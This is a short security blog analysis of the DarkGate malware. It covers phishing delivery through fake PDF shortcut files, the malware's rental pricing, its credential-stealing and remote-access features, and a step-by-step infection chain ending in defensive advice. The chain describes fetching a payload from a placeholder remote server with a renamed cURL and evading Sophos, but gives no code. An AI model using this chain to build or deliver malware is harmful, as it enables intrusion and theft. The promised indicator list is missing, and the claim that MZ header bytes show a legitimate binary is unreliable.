DarkGate (DarkLoader) Malware Analysis

Summary

shamooo

InfoSec Write-ups

· ~5 min read · October 29, 2023 (Updated: October 29, 2023) · Free: Yes

Summary

First publicly reported in 2017, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. The methods for delivering above mentioned malware has changed over time.

Numerous researchers and threat hunters have found phishing campaigns targeting messaging (& online conferencing) applications such as Skype & Microsoft Teams to further gain employees' trust as opposed to the well known attack vector of email phishing.

The malware is disguised as a PDF file with file names such as "Employees_Affected_by_Transition", "Company_Transformations" to grab victims attention and encourage them to open the malware file.

However, in reality the files are malicious shortcut files (LNK) disguised as PDF documents. When a victim is tricked into clicking one of the malicious shortcuts, it triggers a command with the purpose of downloading and running a harmful script from a remote IP address.

Underground Markets

This surge in activity can be attributed to the decision made by the malware's creator, who, after privately using it for a significant period, opted to offer the virus as a service to other malicious actors in the form of malware-as-a-service.

Source: Twitter

In the above screenshot we can see rental service is announced for a private RAT called Dark-Gate. Threat actor claims that the RAT abuses a vulnerability in Microsoft Windows. Price for this malware is $15,000 per month or $100,000 for lifetime access.

Multiple other hacker forums have (or have had) this product for sale. Versions of DarkGate have been advertised on Russian language forum eCrime since May 2023.

Technical Details

DarkGate boasts a range of features, including the ability to:

Execute discovery commands, encompassing directory traversal.
Self-update and self-manage.
Implement remote access software, such as remote desktop protocol (RDP), hidden virtual network computing (hVNC), and AnyDesk.
Facilitate cryptocurrency mining functionality (start, stop, and configure).
Perform keylogging.
Extract data from web browsers.
Execute privilege escalation.

DarkGate leverages the use of AutoIt, a Windows-specific automation and scripting tool, to deliver and execute its malicious operations. Despite the legitimate nature of AutoIt, it is frequently abused by other malware families for defense evasion and an added layer of obfuscation. Notably, this tool has not been observed to be misused by other well-known loaders such as IcedID, Emotet, or Qakbot, making it easier for researchers and security teams to associate its activities with the DarkGate campaign.

Comparing this latest DarkGate variant with a sample that similarly abused AutoIt in 2018, slight changes were noticed in the initial stager and the addition of obfuscation to its command lines. Nevertheless, the overall infection chain remains largely consistent.

Malware flow from Trend Micro

A malicious LNK (shortcut) file, disguised as a PDF document, named "Changes to the vacation schedule.pdf.lnk." This LNK file serves as the initial entry point for the malware.

When the LNK file is executed, it triggers the download and execution of an external VBScript file located at "C:\temp\xxxxx.vbs." This VBScript is responsible for fetching and executing further malicious components.

The VBScript communicates with a remote server at "http://IP:2351/XXXXX" to download additional files. It uses a Windows version of cURL (renamed to "wbza") for this purpose.

The downloaded files include an AutoIt script, and the bundled script XXXXX.au3 which hides malicious code within its structure.

The AutoIt script checks if Sophos antivirus is installed on the victim's system. If Sophos is not detected, it proceeds with additional code execution.

The AutoIt script then executes shellcode. This shellcode employs a technique known as "stacked strings" to create a new file. The file's initial bytes correspond to those of a Windows executable (0x4d and 0x5a), indicating it's a legitimate Windows binary.

The newly created file is DarkGate malware which at this point is loaded into memory.

Recommendations

Restrict Microsoft Teams (Skype) chat requests from specific external domains.
Regularly update EDR software to include detections for latest indicators of compromise. If possible add below mentioned IoCs manually to ensure detection.
Keep an eye on system activity and logs for any unusual or suspicious behavior.
Regularly backup your important data to safeguard against potential data loss.
Educate employees to use caution when dealing with any attachments or links coming from the external sources.